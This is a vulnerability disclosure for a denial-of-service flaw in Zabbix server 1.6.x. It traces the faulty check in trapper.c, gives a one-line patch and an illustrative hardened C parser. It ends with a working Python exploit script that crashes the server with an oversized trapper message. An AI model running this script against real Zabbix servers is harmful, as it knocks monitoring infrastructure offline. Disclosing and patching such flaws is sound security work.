Incident report
Resolution: Fixed
Critical
1.6
None
Zabbix server v1.6.x
While reading Zabbix source code, I found a small error leading to an
easy-to-exploit denial-of-service vulnerability (tested in version 1.6.1
as shipped on Ubuntu and 1.6.5 compiled from source).
In src/zabbix_server/trapper/trapper.c, function process_trap():
- Make a copy of "s" truncated to 2047 characters:
    strscpy(copy,s);
- Check whether there is a ":" in "s" (and not in "copy"!):
    server=(char *)strtok(s,":");
    [...]
- Look for the 1st ":" in "copy":
    value_string=strchr(copy,':');
- If the 1st ":" in "s" is after offset 2047, we get a null pointer
  dereference crash on the next line:
    value_string=strchr(value_string+1,':');
The patch is trivial: just use "copy" instead of "s" in your check.
    server=(char *)strtok(copy,":");
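Added illustration, not code from the report or from Zabbix: a stand-alone C model of the buggy check beside a hardened parser that keys every lookup off the same truncated buffer and tests each strchr() result. The "host:key:value" layout, the COPY_LEN of 2048 and the helper names are assumptions taken from the strchr() sequence quoted above.

```c
#include <string.h>
/* Buffer size the 1.6 trapper uses for "copy" (assumed): 2048 bytes, so
   at most 2047 characters of the message survive the copy. */
#define COPY_LEN 2048
struct trap {
    char buf[COPY_LEN];        /* owns the truncated message */
    char *host, *key, *value;  /* point into buf after parsing */
};

/* Truncating copy with the same effect as strscpy() in the report. */
static void copy_truncated(char *dst, const char *src)
{
    strncpy(dst, src, COPY_LEN - 1);
    dst[COPY_LEN - 1] = '\0';
}

/* Mirrors the faulty check: ':' is tested in the full string "s" while the
   later strchr() calls run on the truncated "copy". Returns 1 when the two
   disagree, the input that made the original call strchr(NULL + 1, ':').
   Nothing is dereferenced here. */
int check_is_inconsistent(const char *s)
{
    char copy[COPY_LEN];
    copy_truncated(copy, s);
    return strchr(s, ':') != NULL && strchr(copy, ':') == NULL;
}

/* Hardened parse: every lookup uses the same truncated buffer and each
   strchr() result is checked before use. Assumes the "host:key:value"
   layout implied by the report's two strchr() calls. 0 = ok, -1 = bad. */
int parse_trap(const char *s, struct trap *out)
{
    char *first, *second;
    copy_truncated(out->buf, s);
    if ((first = strchr(out->buf, ':')) == NULL)
        return -1;                       /* no host separator */
    if ((second = strchr(first + 1, ':')) == NULL)
        return -1;                       /* no key separator */
    *first = *second = '\0';
    out->host = out->buf; out->key = first + 1; out->value = second + 1;
    return 0;
}

/* Constructed input shaped like the report's message: 2050 'A' then ":B". */
const char *report_input(void)
{
    static char msg[2053];
    memset(msg, 'A', 2050);
    strcpy(msg + 2050, ":B");
    return msg;
}
```

With the long message, check_is_inconsistent() reports the mismatch the report describes, and parse_trap() rejects it with -1 instead of crashing.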
Exploit code:
8<-----------------------------------------------------------------
#!/usr/bin/python
# Python 2 script (print statement, str payloads)
PORT = 10051
HOST = "192.168.2.89"
import socket
import struct
try:
    # use "sock" so the socket module is not shadowed by the connection object
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(3)
    sock.connect((HOST, PORT))
    header = 'ZBXD\x01'
    # DoS in ./src/zabbix_server/trapper/trapper.c
    # If first ":" is after 2047 => DoS when reading NULL+1
    data = 'A'*2050 + ':B'
    size = struct.pack('q', len(data))
    sock.send(header + size + data)
    rcvdata = sock.recv(10240)
    print rcvdata
except:
    print "FAIL"
sock.close()
8<-----------------------------------------------------------------